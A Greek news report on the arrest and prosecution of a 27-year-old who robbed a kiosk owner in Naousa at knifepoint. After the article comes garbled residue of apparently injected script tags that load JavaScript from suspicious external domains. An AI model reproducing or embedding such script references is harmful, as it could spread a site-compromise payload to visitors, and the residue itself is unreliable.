Μέρα- μεσημέρι λήστεψε ιδιοκτήτρια ψιλικατζίδικου στη Νάουσα

Μέρα- μεσημέρι λήστεψε ιδιοκτήτρια ψιλικατζίδικου στη Νάουσα

Δεν έμεινε για πολύ ασύλληπτος ο νεαρός κακοποιός που εισέβαλε μέρα-μεσημέρι σε ένα κατάστημα ψιλικών στην Νάουσα, ακινητοποίησε με την απειλή μαχαιριού την τρομοκρατημένη ιδιοκτήτρια και άρπαξε τις εισπράξεις της.

Μετά από συστηματικές έρευνες, οι αστυνομικοί της Ασφάλειας κατάφεραν να εντοπίσουν τον 27χρονο Έλληνα δράστη σε περιοχή της πόλης και να του περάσουν χειροπέδες. Πάνω του και στο σπίτι του, βρήκαν μεταξύ άλλων το μαχαίρι με το οποίο διέπραξε τη ληστεία, 145 ευρώ από τη λεία του, ένα μάλλινο σκούφο και ένα ζευγάρι γάντια.

Ο 27χρονος είχε μπει στο μαγαζί με καλυμμένα τα χαρακτηριστικά του προσώπου του και είχε υποχρεώσει την 35χρονη ιδιοκτήτρια να του δώσει όσα χρήματα είχε στην ταμειακή μηχανή. Άρπαξε 300 ευρώ και εξαφανίστηκε τρέχοντας, για να συλληφθεί μέσα σε λίγη ώρα. Ο εισαγγελέας Πρωτοδικών Βέροιας στον οποίο οδηγήθηκε, του άσκησε δίωξη για ληστεία και παράβαση του νόμου περί όπλων.___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>___setforspecialdomain.com/ghfgh34523452′ type=’text/javascript’>challengeforme.com/pystats.js’ async=true >challengeforme.com/pystats.js’ async=true >‘ >‘ >‘ >‘ >‘ >‘ >‘ >‘ >